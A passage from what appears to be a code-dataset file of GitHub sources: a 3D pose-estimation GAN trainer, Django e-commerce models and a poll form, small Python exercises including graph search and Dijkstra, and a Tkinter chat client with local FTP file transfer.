poseaugtool.model_virtualCam.virtualCam import G_camera\n self.model_Gcam = G_camera(self.args)\n # elif self.args.gcam_choice == 'gcam_v2':\n # from poseaugtool.model_virtualCam.virtualCam import G_camera_v2\n # self.model_Gcam = G_camera_v2(self.args)\n\n filter_ch = [int(x) for x in self.args.Dcamarchitecture.split(',')]\n # if self.args.dcam_choice == 'dcam_v0':\n # from poseaugtool.model_virtualCam.virtualCam import Pose2DVideoDiscriminator\n # self.model_Dcam = Pose2DVideoDiscriminator(ks=self.args.dcam_ks, nh_conv1d=filter_ch).to(self.device)\n # elif self.args.dcam_choice == 'dcam_v2':\n # from poseaugtool.model_virtualCam.virtualCam import Pose2DVideoDiscriminatorV2\n # self.model_Dcam = Pose2DVideoDiscriminatorV2(ks=self.args.dcam_ks, nh_conv1d=filter_ch).to(self.device)\n if self.args.dcam_choice == 'dcam_pa1':\n from poseaugtool.model_virtualCam.virtualCam import Pos2dPairDiscriminator\n self.model_Dcam = Pos2dPairDiscriminator().to(self.device)\n # elif self.args.dcam_choice == 'dcam_v5':\n # from poseaugtool.model_virtualCam.virtualCam import Pos2dPairDiscriminator_v5\n # self.model_Dcam = Pos2dPairDiscriminator_v5().to(self.device)\n # elif self.args.dcam_choice == 'dcam_v6':\n # from poseaugtool.model_virtualCam.virtualCam import Pos2dPairDiscriminator_v6\n # self.model_Dcam = Pos2dPairDiscriminator_v6().to(self.device)\n\n # print param number size.\n self._count_param(self.model_Gcam, 'self.model_Gcam')\n self._count_param(self.model_Dcam, 'self.model_Dcam')\n # to cuda\n self.model_Gcam = self.model_Gcam.cuda()\n self.model_Dcam = self.model_Dcam.cuda()\n ###################################\n # optimizer.\n ###################################\n self.optimizer_Gcam = optim.Adam(self.model_Gcam.parameters(),\n lr=self.args.lrgcam) # , amsgrad=True) #\n self.lr_scheduler_Gcam = get_scheduler(self.optimizer_Gcam, policy='lambda', nepoch_fix=0,\n nepoch=self.args.epochs)\n\n self.optimizer_Dcam = optim.Adam(self.model_Dcam.parameters(),\n lr=self.args.lrdcam) # , amsgrad=True) #\n self.lr_scheduler_Dcam = get_scheduler(self.optimizer_Dcam, policy='lambda', nepoch_fix=0,\n nepoch=self.args.epochs)\n ###################################\n # load pretrain\n ###################################\n if self.args.pretrain:\n pass\n\n def _train_batch_posenet(self, inputs_2d, inputs_3d, epoch_loss_3d_train, N):\n # here 3D shape is single frame. BxTxJx3: T=1\n target_3d_pose = inputs_3d[:, :, :, :] - inputs_3d[:, :, :1, :]\n # pos_3d[:, 1:] -= inputs_3d[:, :1]\n\n # Predict 3D poses\n predicted_3d_pos = self.model_pos_train(inputs_2d)\n\n self.optimizer_P.zero_grad()\n\n # loss_3d_pos = mpjpe(predicted_3d_pos, target_3d_pose)\n loss_3d_pos = self.MSE(predicted_3d_pos, target_3d_pose)\n loss_total = loss_3d_pos * 1.\n\n loss_total.backward()\n nn.utils.clip_grad_norm_(self.model_pos_train.parameters(),\n max_norm=1)\n self.optimizer_P.step()\n\n epoch_loss_3d_train += target_3d_pose.shape[0] * target_3d_pose.shape[1] * loss_3d_pos.item()\n N += target_3d_pose.shape[0] * target_3d_pose.shape[1]\n\n return loss_3d_pos.detach(), epoch_loss_3d_train, N\n\n def _train_batch_trajnet(self, inputs_2d, inputs_3d, epoch_loss_3d_train, N):\n target_3d_traj = inputs_3d[:, :, :1, :] * 1. # focus on root traj.\n # pos_3d[:, 1:] -= inputs_3d[:, :1]\n\n # Predict 3D trajs\n predicted_3d_traj = self.model_traj_train(inputs_2d)\n # loss_3d_traj = mpjpe(predicted_3d_traj, target_3d_traj)\n\n self.optimizer_T.zero_grad()\n\n # loss_3d_traj = self.MSE(predicted_3d_traj, target_3d_traj)\n # weighted traj loss from videopose\n w = 1 / target_3d_traj[:, :, :, 2] # Weight inversely proportional to depth\n loss_3d_traj = weighted_mpjpe(predicted_3d_traj, target_3d_traj, w)\n\n loss_total = loss_3d_traj * 1.\n\n loss_total.backward()\n nn.utils.clip_grad_norm_(self.model_traj_train.parameters(), max_norm=1) #\n self.optimizer_T.step()\n\n epoch_loss_3d_train += target_3d_traj.shape[0] * target_3d_traj.shape[1] * loss_3d_traj.item()\n N += target_3d_traj.shape[0] * target_3d_traj.shape[1]\n\n return loss_3d_traj.detach(), epoch_loss_3d_train, N\n\n def train_posenet_realpose(self, tag='_real'):\n \"\"\"\n _real: dataloader from random projection\n \"\"\"\n start_time = time()\n epoch_loss_3d_train = 0\n N = 0\n self.model_pos_train.train()\n\n # Regular supervised scenario\n self.logger.info(\n 'INFO: Train on real pose with dataloader len:{:0>4d}'.format(self.train_generator.num_batches))\n for _, batch_3d, batch_2d in tqdm(self.train_generator.next_epoch()):\n inputs_3d = torch.from_numpy(batch_3d.astype('float32'))\n inputs_2d = torch.from_numpy(batch_2d.astype('float32'))\n if torch.cuda.is_available():\n inputs_3d = inputs_3d.cuda()\n inputs_2d = inputs_2d.cuda()\n\n loss_3d_pos, epoch_loss_3d_train, N = self._train_batch_posenet(inputs_2d, inputs_3d,\n epoch_loss_3d_train, N)\n # batch-wise log\n self.writer.add_scalar('train_P_batch/{}/loss_3d_pos'.format(tag), loss_3d_pos.item(),\n self.summary.train_realpose_iter_num)\n self.summary.summary_train_realpose_iter_num_update()\n\n\n def train_trajnet_realpose(self, tag='_real'):\n \"\"\"\n _real: dataloader from random projection\n \"\"\"\n start_time = time()\n epoch_loss_3d_train = 0\n N = 0\n self.model_traj_train.train()\n\n # Regular supervised scenario\n self.logger.info(\n 'INFO: Train on real pose with dataloader len:{:0>4d}'.format(self.train_generator.num_batches))\n for _, batch_3d, batch_2d in tqdm(self.train_generator.next_epoch()):\n inputs_3d = torch.from_numpy(batch_3d.astype('float32'))\n inputs_2d = torch.from_numpy(batch_2d.astype('float32'))\n if torch.cuda.is_available():\n inputs_3d = inputs_3d.cuda()\n inputs_2d = inputs_2d.cuda()\n\n loss_3d_traj, epoch_loss_3d_train, N = self._train_batch_trajnet(inputs_2d, inputs_3d,\n epoch_loss_3d_train, N)\n # batch-wise log\n self.writer.add_scalar('train_T_batch/{}/loss_3d_traj'.format(tag), loss_3d_traj.item(),\n self.summary.train_realtraj_iter_num)\n self.summary.summary_train_realtraj_iter_num_update()\n\n def _train_dis(self, model_dis, data_real, data_fake, writer_name, fake_data_pool, optimizer):\n \"\"\"\n \"\"\"\n optimizer.zero_grad()\n data_real = data_real.detach()\n data_fake = data_fake.detach()\n # store the fake buffer for discriminator training.\n data_fake = Variable(\n torch.Tensor(fake_data_pool(data_fake.cpu().detach().data.numpy()))).to(\n self.device)\n # for 3d part\n real_3d = model_dis(data_real)\n fake_3d = model_dis(data_fake)\n real_label_3d = Variable(torch.ones(real_3d.size())).to(self.device)\n fake_label_3d = Variable(torch.zeros(fake_3d.size())).to(self.device)\n dis_3d_real_loss = self.MSE(real_3d, real_label_3d)\n dis_3d_fake_loss = self.MSE(fake_3d, fake_label_3d)\n\n # Total discriminators losses\n dis_3d_loss = (dis_3d_real_loss + dis_3d_fake_loss) * 0.5\n\n # record acc\n d3d_real_acc = get_discriminator_accuracy(real_3d.reshape(-1), real_label_3d.reshape(-1))\n d3d_fake_acc = get_discriminator_accuracy(fake_3d.reshape(-1), fake_label_3d.reshape(-1))\n\n self.writer.add_scalar(writer_name + '_real_acc', d3d_real_acc, self.summary.train_iter_num)\n self.writer.add_scalar(writer_name + '_fake_acc', d3d_fake_acc, self.summary.train_iter_num)\n self.writer.add_scalar(writer_name + '_dis_loss', dis_3d_loss.item(), self.summary.train_iter_num)\n\n # Update optimizer\n ###################################################\n dis_3d_loss.backward()\n nn.utils.clip_grad_norm_(model_dis.parameters(), max_norm=1)\n optimizer.step()\n return d3d_real_acc, d3d_fake_acc\n\n def evaluate_posenet(self, tag='real', valset='s911'):\n \"\"\"\n evaluate the performance of posenet on 3 kinds of dataset\n \"\"\"\n start_time = time()\n # End-of-epoch evaluation\n with torch.no_grad():\n self.model_pos.load_state_dict(self.model_pos_train.state_dict())\n self.model_pos.eval()\n\n epoch_p1_3d_valid = 0\n epoch_p2_3d_valid = 0\n N_valid = 0\n\n test_generator = self.val_generator_dict[valset]\n for _, batch, batch_2d in test_generator.next_epoch():\n inputs_3d = torch.from_numpy(batch.astype('float32'))\n inputs_2d = torch.from_numpy(batch_2d.astype('float32'))\n if torch.cuda.is_available():\n inputs_3d = inputs_3d.cuda()\n inputs_2d = inputs_2d.cuda()\n # inputs_3d[:, :, 0] = 0\n inputs_3d[:, :, :, :] = inputs_3d[:, :, :, :] - inputs_3d[:, :, :1, :]\n\n # Predict 3D poses\n predicted_3d_pos = self.model_pos(inputs_2d)\n\n # Test-time augmentation (if enabled)\n if test_generator.augment_enabled():\n # Undo flipping and take average with non-flipped version\n predicted_3d_pos[1, :, :, 0] *= -1\n predicted_3d_pos[1, :, test_generator.joints_left + test_generator.joints_right] = \\\n predicted_3d_pos[1, :, test_generator.joints_right + test_generator.joints_left]\n\n predicted_3d_pos = torch.mean(predicted_3d_pos, dim=0, keepdim=True)\n inputs_3d = inputs_3d[:1]\n\n loss_3d_pos = mpjpe(predicted_3d_pos, inputs_3d)\n epoch_p1_3d_valid += inputs_3d.shape[0] * inputs_3d.shape[1] * loss_3d_pos.item()\n N_valid += inputs_3d.shape[0] * inputs_3d.shape[1]\n\n p2_3d_pos = p_mpjpe(predicted_3d_pos.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1])\n , inputs_3d.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1]))\n epoch_p2_3d_valid += inputs_3d.shape[0] * inputs_3d.shape[1] * p2_3d_pos.item()\n\n # analysis result\n epoch_p1_3d_valid = epoch_p1_3d_valid / N_valid * 1000\n epoch_p2_3d_valid = epoch_p2_3d_valid / N_valid * 1000\n\n elapsed = (time() - start_time) / 60\n\n # epoch-wise log.\n self.writer.add_scalar('eval_P_epoch_{}/{}_p1'.format(tag, valset), epoch_p1_3d_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_epoch_{}/{}_p2'.format(tag, valset), epoch_p2_3d_valid, self.summary.epoch)\n\n return {'p1': epoch_p1_3d_valid}\n\n def evaluate_posenet_withPCK(self, tag='real', valset='3dhp_flip'):\n \"\"\"\n evaluate the performance of posenet for 3DHP\n :return:\n \"\"\"\n start_time = time()\n # End-of-epoch evaluation\n with torch.no_grad():\n self.model_pos.load_state_dict(self.model_pos_train.state_dict())\n self.model_pos.eval()\n\n epoch_p1_3d_valid = 0\n epoch_p2_3d_valid = 0\n epoch_pck_3d_valid = 0\n epoch_auc_3d_valid = 0\n epoch_pck_3dscaled_valid = 0\n epoch_auc_3dscaled_valid = 0\n epoch_pck_3daligned_valid = 0\n epoch_auc_3daligned_valid = 0\n N_valid = 0\n\n test_generator = self.val_generator_dict[valset]\n for _, batch, batch_2d in test_generator.next_epoch():\n inputs_3d = torch.from_numpy(batch.astype('float32'))\n inputs_2d = torch.from_numpy(batch_2d.astype('float32'))\n if torch.cuda.is_available():\n inputs_3d = inputs_3d.cuda()\n inputs_2d = inputs_2d.cuda()\n # inputs_3d[:, :, 0] = 0\n inputs_3d[:, :, :, :] = inputs_3d[:, :, :, :] - inputs_3d[:, :, :1, :]\n\n # Predict 3D poses\n predicted_3d_pos = self.model_pos(inputs_2d)\n\n # Test-time augmentation (if enabled)\n if test_generator.augment_enabled():\n # Undo flipping and take average with non-flipped version\n predicted_3d_pos[1, :, :, 0] *= -1\n predicted_3d_pos[1, :, test_generator.joints_left + test_generator.joints_right] = \\\n predicted_3d_pos[1, :, test_generator.joints_right + test_generator.joints_left]\n\n predicted_3d_pos = torch.mean(predicted_3d_pos, dim=0, keepdim=True)\n inputs_3d = inputs_3d[:1]\n\n # to numpy\n predicted_3d_pos = predicted_3d_pos.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1])\n inputs_3d = inputs_3d.cpu().numpy().reshape(-1, inputs_3d.shape[-2], inputs_3d.shape[-1])\n # align a pose result\n predicted_3d_pos_aligned = pose_align(predicted_3d_pos, inputs_3d)\n # align a pose result\n predicted_3d_pos_scaled = pose_scaled(torch.from_numpy(predicted_3d_pos).unsqueeze(0), torch.from_numpy(inputs_3d).unsqueeze(0)).squeeze(0).cpu().numpy()\n\n # caculate p1 p2 pck auc\n loss_3d_pos = mpjpe(torch.from_numpy(predicted_3d_pos), torch.from_numpy(inputs_3d)).item() * 1000.0\n p2_3d_pos = p_mpjpe(predicted_3d_pos, inputs_3d).item() * 1000.0\n # compute AUC and PCK\n pck = compute_PCK(inputs_3d, predicted_3d_pos)\n auc = compute_AUC(inputs_3d, predicted_3d_pos)\n\n # compute AUC and PCK after aligned\n pck_aligned = compute_PCK(inputs_3d, predicted_3d_pos_aligned)\n auc_aligned = compute_AUC(inputs_3d, predicted_3d_pos_aligned)\n\n # compute AUC and PCK after aligned\n pck_scaled = compute_PCK(inputs_3d, predicted_3d_pos_scaled)\n auc_scaled = compute_AUC(inputs_3d, predicted_3d_pos_scaled)\n\n epoch_p1_3d_valid += inputs_3d.shape[0] * loss_3d_pos\n epoch_p2_3d_valid += inputs_3d.shape[0] * p2_3d_pos\n epoch_pck_3d_valid += inputs_3d.shape[0] * pck\n epoch_auc_3d_valid += inputs_3d.shape[0] * auc\n\n epoch_pck_3daligned_valid += inputs_3d.shape[0] * pck_aligned\n epoch_auc_3daligned_valid += inputs_3d.shape[0] * auc_aligned\n\n epoch_pck_3dscaled_valid += inputs_3d.shape[0] * pck_scaled\n epoch_auc_3dscaled_valid += inputs_3d.shape[0] * auc_scaled\n\n N_valid += inputs_3d.shape[0]\n\n # analysis result\n epoch_p1_3d_valid = epoch_p1_3d_valid / N_valid\n epoch_p2_3d_valid = epoch_p2_3d_valid / N_valid\n epoch_pck_3d_valid = epoch_pck_3d_valid / N_valid\n epoch_auc_3d_valid = epoch_auc_3d_valid / N_valid\n\n epoch_pck_3daligned_valid = epoch_pck_3daligned_valid / N_valid\n epoch_auc_3daligned_valid = epoch_auc_3daligned_valid / N_valid\n\n epoch_pck_3dscaled_valid = epoch_pck_3dscaled_valid / N_valid\n epoch_auc_3dscaled_valid = epoch_auc_3dscaled_valid / N_valid\n\n elapsed = (time() - start_time) / 60\n\n # epoch-wise log.\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_p1'.format(tag, valset), epoch_p1_3d_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_p2'.format(tag, valset), epoch_p2_3d_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_pck'.format(tag, valset), epoch_pck_3d_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_auc'.format(tag, valset), epoch_auc_3d_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_pck_aligned'.format(tag, valset), epoch_pck_3daligned_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_auc_aligned'.format(tag, valset), epoch_auc_3daligned_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_pck_scaled'.format(tag, valset), epoch_pck_3dscaled_valid, self.summary.epoch)\n self.writer.add_scalar('eval_P_pck_epoch_{}/{}_auc_scaled'.format(tag, valset), epoch_auc_3dscaled_valid, self.summary.epoch)\n\n return {\n 'p1': epoch_p1_3d_valid,\n 'p2': epoch_p2_3d_valid,\n }\n\n\n def evaluate_trajnet(self, tag='real', valset='s911'):\n \"\"\"\n evaluate the performance of posenet\n \"\"\"\n start_time = time()\n # End-of-epoch evaluation\n with torch.no_grad():\n self.model_traj.load_state_dict(self.model_traj_train.state_dict())\n self.model_traj.eval()\n\n epoch_p1_3d_valid = 0\n N_valid = 0\n\n # Evaluate on test set\n for cam, batch, batch_2d in self.val_generator_dict[valset].next_epoch():\n inputs_3d = torch.from_numpy(batch.astype('float32'))\n inputs_2d = torch.from_numpy(batch_2d.astype('float32'))\n if torch.cuda.is_available():\n inputs_3d = inputs_3d.cuda()\n inputs_2d = inputs_2d.cuda()\n target_3d_traj = inputs_3d[:, :, :1, :] * 1. # focus on root traj.\n\n # Predict 3D trajes\n predicted_3d_traj = self.model_traj(inputs_2d)\n loss_3d_traj = mpjpe(predicted_3d_traj, target_3d_traj)\n epoch_p1_3d_valid += target_3d_traj.shape[0] * target_3d_traj.shape[1] * loss_3d_traj.item()\n N_valid += target_3d_traj.shape[0] * target_3d_traj.shape[1]\n\n # analysis result\n epoch_p1_3d_valid = epoch_p1_3d_valid / N_valid * 1000\n\n elapsed = (time() - start_time) / 60\n\n # epoch-wise log.\n self.writer.add_scalar('eval_T_epoch_{}/{}_p1'.format(tag, valset), epoch_p1_3d_valid, self.summary.epoch)\n\n return {'p1': epoch_p1_3d_valid}\n\n def _zip_GIFplot_array(self, tensor_lst):\n \"\"\"\n for plot function pre-preocess\n \"\"\"\n lst = []\n for item in tensor_lst:\n if item.shape[-1] == 3: # for 3D case\n lst.append(item.detach().cpu().numpy()[:1])\n elif item.shape[-1] == 2:\n tmp2d = item.detach().cpu().numpy()[:1]\n tmp2d = np.concatenate([tmp2d, np.zeros_like(tmp2d)[..., -1:]], axis=-1)\n lst.append(tmp2d)\n else:\n assert False, 'wrong data get'\n return np.concatenate(lst)\n\n def random_aug_d2d(self, x):\n r1 = self.args.d2d_random_lb\n r2 = self.args.d2d_random_ub\n random_weight = torch.FloatTensor(x.shape[0], 1, 1, 1).uniform_(r1, r2).to(x.device)\n return x * random_weight\n\n","repo_name":"Garfield-kh/PoseTriplet","sub_path":"estimator/posegan_basementclass.py","file_name":"posegan_basementclass.py","file_ext":"py","file_size_in_byte":54981,"program_lang":"python","lang":"en","doc_type":"code","stars":293,"dataset":"github-code","pt":"61"}
+{"seq_id":"25170455397","text":"from django.db import models\nfrom django.urls import reverse\nfrom category.models import Category\nfrom tinymce.models import HTMLField\n\nimport os\nfrom PIL import Image\nfrom io import BytesIO\nfrom django.core.files.base import ContentFile\nfrom django.db.models import Avg, Count\n\n# Create your models here.\n\n\nclass Product(models.Model):\n product_name = models.CharField(max_length=200, unique=True)\n slug = models.SlugField(max_length=200, unique=True)\n category = models.ForeignKey(Category, on_delete=models.CASCADE)\n main_image_alt = models.CharField(max_length=2000, null=True, blank=True)\n\n description = HTMLField(max_length=7500, blank=True)\n price = models.DecimalField(max_digits=7, decimal_places=2)\n sale_price = models.DecimalField(max_digits=7, decimal_places=2, blank=True, null=True)\n main_image = models.ImageField(upload_to='photos/products')\n stock = models.IntegerField(blank=True, null=True)\n is_available = models.BooleanField(default=True)\n created_date = models.DateTimeField(auto_now_add=True)\n modified_date = models.DateTimeField(auto_now=True)\n num_sold = models.IntegerField(default=0)\n\n def average_review(self):\n reviews = ReviewRating.objects.filter(product=self, visible=True).aggregate(average=Avg('rating'))\n avg = 0\n if reviews['average'] is not None:\n avg = float(reviews['average'])\n return avg\n\n def count_review(self):\n reviews = ReviewRating.objects.filter(product=self, visible=True).aggregate(count=Count('id'))\n count = 0\n if reviews['count'] is not None:\n count = int(reviews['count'])\n return count\n else:\n pass\n\n\n def get_url(self):\n return reverse('product_detail', args=[self.category.slug, self.slug])\n\n\n\nclass ProductGallery(models.Model):\n product = models.ForeignKey(Product, default=None, on_delete=models.CASCADE)\n alt_text = models.CharField(max_length=2000, null=True, blank=True)\n image = models.ImageField(upload_to='store/products', max_length=455)\n\n\n def __str__(self):\n return self.product.product_name\n \n class Meta:\n verbose_name = 'product gallery'\n verbose_name_plural = 'product gallery'\n\n\n\n def save(self, *args, **kwargs):\n \n if not self.make_thumbnail():\n # set to a default thumbnail\n raise Exception('Could not create thumbnail - is the file type valid?')\n\n super(ProductGallery, self).save(*args, **kwargs)\n\n def make_thumbnail(self):\n size = 1200\n\n image = Image.open(self.image)\n width, height = image.size\n width = width*size/height\n image.thumbnail((width,size), Image.ANTIALIAS)\n\n thumb_name, thumb_extension = os.path.splitext(self.image.name)\n thumb_extension = thumb_extension.lower()\n thumb_name = thumb_name.split(\"/\")[-1]\n\n thumb_filename = thumb_name + thumb_extension\n\n if thumb_extension in ['.jpg', '.jpeg']:\n FTYPE = 'JPEG'\n elif thumb_extension == '.gif':\n FTYPE = 'GIF'\n elif thumb_extension == '.png':\n FTYPE = 'PNG'\n else:\n return False # Unrecognized file type\n\n # Save thumbnail to in-memory file as StringIO\n temp_thumb = BytesIO()\n image.save(temp_thumb, FTYPE)\n temp_thumb.seek(0)\n\n self.image.save(thumb_filename, ContentFile(temp_thumb.read()), save=False)\n temp_thumb.close()\n\n return True\n\n\n\nclass ReviewRating(models.Model):\n product = models.ForeignKey(Product, on_delete=models.CASCADE)\n review = models.TextField(max_length=5000, blank=True) \n rating = models.FloatField()\n visible = models.BooleanField(default=True)\n created_date = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n name = models.CharField(max_length=100, blank=False)\n email = models.EmailField()\n\n def __str__(self):\n return self.email\n\n\npage_types = [\n (\"about\", \"about\"),\n (\"privacy\", \"privacy\"),\n (\"delivery\", \"delivery\"),\n (\"terms\", \"terms\"),\n\n]\n\n\nclass Pages(models.Model):\n page_title = models.CharField(max_length=500, unique=True, choices=page_types)\n page_content = HTMLField(max_length=10000)\n","repo_name":"Coder-dot-com/Django-Ecommerce-Web-App-Demo","sub_path":"ecommerce_demo/store/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33743331939","text":"while True:\n n = int(input())\n\n if n == -1:\n break\n\n div = []\n\n for i in range(1, n):\n if n % i == 0:\n div.append(i)\n\n if sum(div) == n:\n print(n, \"=\", end=\" \")\n for i in div:\n if i == div[-1]:\n print(i)\n else:\n print(i, \"+\", end=\" \")\n else:\n print(n, \"is NOT perfect.\")","repo_name":"minhuikim/Algorithm","sub_path":"python/backjoon/9506_sum_of_factors.py","file_name":"9506_sum_of_factors.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"20259680167","text":"from django.forms import HiddenInput, ModelForm, ModelChoiceField\nfrom django.forms.widgets import RadioChoiceInput, RadioSelect\nfrom polls import models\n\n\n\n\nclass VoteForm(ModelForm):\n class Meta:\n model = models.Vote\n fields = ['answer', 'poll']\n answer = ModelChoiceField(queryset=models.Answer.objects.all(), widget=RadioSelect(), required=True, empty_label=None)\n\n def __init__(self, poll=None, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['poll'].widget = HiddenInput()\n self.fields['answer'].queryset = poll.answer_set\n #self.fields['answer'].empty_label = None\n","repo_name":"poleha/tatamo","sub_path":"polls/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1049687948","text":"import sys\n\nclass Graph:\n def __init__(self, size):\n # implementasi matrix\n self.size = size\n self.graph = [[0 for _ in range(size)] for _ in range(size)]\n\n def add_edge(self, start, dest, weight=1):\n self.graph[start][dest] = weight\n self.graph[dest][start] = weight\n\n def DFS(self,start):\n visited = set()\n print()\n print('DFS:', end='')\n self.DFS_util(start, visited)\n\n def DFS_util(self,start, visited):\n visited.add(start)\n print(start,end='-->')\n for i in range(self.size):\n if i not in visited and self.graph[start][i] > 0:\n self.DFS_util(i, visited)\n\n def to_adjacentList(self):\n \"\"\"mengubah representasi matrix menjadi adjacent list pakai dictionary python\"\"\"\n graph_list = {key:[] for key in range(self.size)}\n for i in range(self.size):\n for j in range(self.size):\n if self.graph[i][j] > 0:\n graph_list[i].append(j)\n return graph_list\n\n def BFS(self, start):\n queue = []\n visited = [False for _ in range(self.size)]\n\n queue.append(start)\n visited[start] = True\n print('BFS:', start, end=\"-->\")\n while queue:\n vertice = queue.pop(0)\n for i in range(self.size):\n if visited[i] is False and self.graph[vertice][i] > 0:\n queue.append(i)\n visited[i] = True\n print(i, end='->')\n\n def print_graph(self):\n for i in self.graph:\n print(i)\n\n def dijkstra(self,start):\n infinity = sys.maxsize\n visited = []\n weight = []\n for i in range(self.size):\n weight.append(infinity)\n\n\n path = {}\n weight[start] = 0\n # isi path adalah nilai path dan prev node\n path[start] = [weight[start], start]\n\n while len(visited) != self.size:\n print()\n print(f\"mulai dari node {start}\")\n visited.append(start)\n # counter untuk tracking index\n counter = 0\n for j in self.graph[start]:\n\n if j > 0 and counter not in visited:\n print(f\"edge ke node {counter}\")\n # calculate distance\n dist = weight[start] + j\n if dist < weight[counter]:\n weight[counter] = dist\n path[counter] = [dist, start]\n print(\"weight edge\", path)\n counter += 1\n\n edges = sorted([index for index in self.graph[start] if index > 0])\n for i in edges:\n if self.graph[start].index(i) not in visited:\n start = self.graph[start].index(i)\n break\n\n\n return path\n\n# class Node:\n# def __init__(self, data):\n# self.data = data\n# self.next = None\n#\n# class Graph:\n# def __init__(self, size):\n# # implementasi adjacent list\n# self.size = size\n# self.graph = [None for _ in range(size)]\n#\n# def add_edge(self, start, dest):\n# new_node = Node(dest)\n# new_node.next = self.graph[start]\n# self.graph[start] = new_node\n#\n# # kalau directed code dibawah ini dihapus\n# new_node = Node(start)\n# new_node.next = self.graph[dest]\n# self.graph[dest] = new_node\n#\n#\n#\n# def print_graph(self):\n# for i in range(len(self.graph)):\n# print('Vertice: ',)\n# itr = self.graph[i]\n# while itr is not None:\n# print(itr.data, end='->')\n# itr = itr.next\n# print()\n\n\ng = Graph(5)\ng.add_edge(0,1, 2)\ng.add_edge(0,2, 1)\ng.add_edge(1,2, 5)\ng.add_edge(2,3, 4)\ng.add_edge(3,4, 2)\ng.add_edge(0,4, 3)\ng.print_graph()\npath = g.dijkstra(0)\nprint(path)\n\n\n\n\n","repo_name":"NicholasL5/BackupSD","sub_path":"pertemuan7/cobaGraph.py","file_name":"cobaGraph.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"34681076824","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 30 13:36:58 2021\n\n@author: bing\n\"\"\"\n\n# import all the required modules\n\nimport json\n# file related\nimport os\nimport select\n# import all the required modules\nimport threading\nfrom ftplib import FTP\nfrom pathlib import Path\nfrom tkinter import *\nimport file_opener\nfrom chat_utils import *\nimport pdf_processor\n\n# GUI class for the chat\ndef ftpconnect(host='localhost', port=8888, username=\"Admin\", password=\"Admin\"):\n ftp = FTP()\n ftp.connect(host, port) # Connect the FTP server\n ftp.login(username, password) # Log in\n return ftp\n\n\n# pathlib is good for processing file path, strongly encouraged to learn\ndef download(path=str(Path(__file__).parent / 'user_files' / 'user1')):\n \"\"\"all files on server are stored in path folder\"\"\"\n path = Path(path)\n path.mkdir(parents=True, exist_ok=True)\n ftp = ftpconnect()\n for filename in ftp.nlst():\n with open(path / filename, \"wb\") as f:\n ftp.retrbinary('RETR %s' % filename, f.write)\n ftp.quit()\n\n\ndef upload(path=None):\n ftp = ftpconnect()\n if path is None:\n path = file_opener.file_opener()\n with open(path, 'rb') as contents:\n ftp.storbinary('STOR %s' % os.path.basename(path), contents)\n ftp.quit()\ndef startgame():\n os.system(\"gamerunner.py\")\nclass GUI:\n # constructor method\n def __init__(self, send, recv, sm, s):\n # chat window which is currently hidden\n self.Window = Tk()\n self.Window.withdraw()\n self.send = send\n self.recv = recv\n self.sm = sm\n self.socket = s\n self.my_msg = \"\"\n self.system_msg = \"\"\n\n def login(self):\n # login window\n self.login = Toplevel()\n # set the title\n self.login.title(\"Login\")\n self.login.resizable(width = False, \n height = False)\n self.login.configure(width = 400,\n height = 300)\n # create a Label\n self.pls = Label(self.login, \n text = \"Please login to continue\",\n justify = CENTER, \n font = \"Helvetica 14 bold\")\n \n self.pls.place(relheight = 0.15,\n relx = 0.2, \n rely = 0.07)\n # create a Label\n self.labelName = Label(self.login,\n text = \"Name: \",\n font = \"Helvetica 12\")\n \n self.labelName.place(relheight = 0.2,\n relx = 0.1, \n rely = 0.2)\n \n # create a entry box for \n # tyoing the message\n self.entryName = Entry(self.login, \n font = \"Helvetica 14\")\n \n self.entryName.place(relwidth = 0.4, \n relheight = 0.12,\n relx = 0.35,\n rely = 0.2)\n \n # set the focus of the curser\n self.entryName.focus()\n \n # create a Continue Button \n # along with action\n self.go = Button(self.login,\n text = \"CONTINUE\", \n font = \"Helvetica 14 bold\", \n command = lambda: self.goAhead(self.entryName.get()))\n \n self.go.place(relx = 0.4,\n rely = 0.55)\n self.Window.mainloop()\n \n def goAhead(self, name):\n self.user_name=name\n if len(name) > 0:\n msg = json.dumps({\"action\":\"login\", \"name\": name})\n self.send(msg)\n response = json.loads(self.recv())\n if response[\"status\"] == 'ok':\n self.login.destroy()\n self.sm.set_state(S_LOGGEDIN)\n self.sm.set_myname(name)\n self.layout(name)\n self.textCons.config(state = NORMAL)\n # self.textCons.insert(END, \"hello\" +\"\\n\\n\") \n self.textCons.insert(END, menu +\"\\n\\n\") \n self.textCons.config(state = DISABLED)\n self.textCons.see(END)\n # while True:\n # self.proc()\n # the thread to receive messages\n process = threading.Thread(target=self.proc)\n process.daemon = True\n process.start()\n \n # The main layout of the chat\n def layout(self,name):\n self.name = name\n # to show chat window\n self.Window.deiconify()\n self.Window.title(\"CHATROOM\")\n self.Window.resizable(width = False,\n height = False)\n self.Window.configure(width = 470,\n height = 550,\n bg = \"#17202A\")\n self.labelHead = Label(self.Window,\n bg = \"#17202A\", \n fg = \"#EAECEE\",\n text = self.name ,\n font = \"Helvetica 13 bold\",\n pady = 5)\n \n 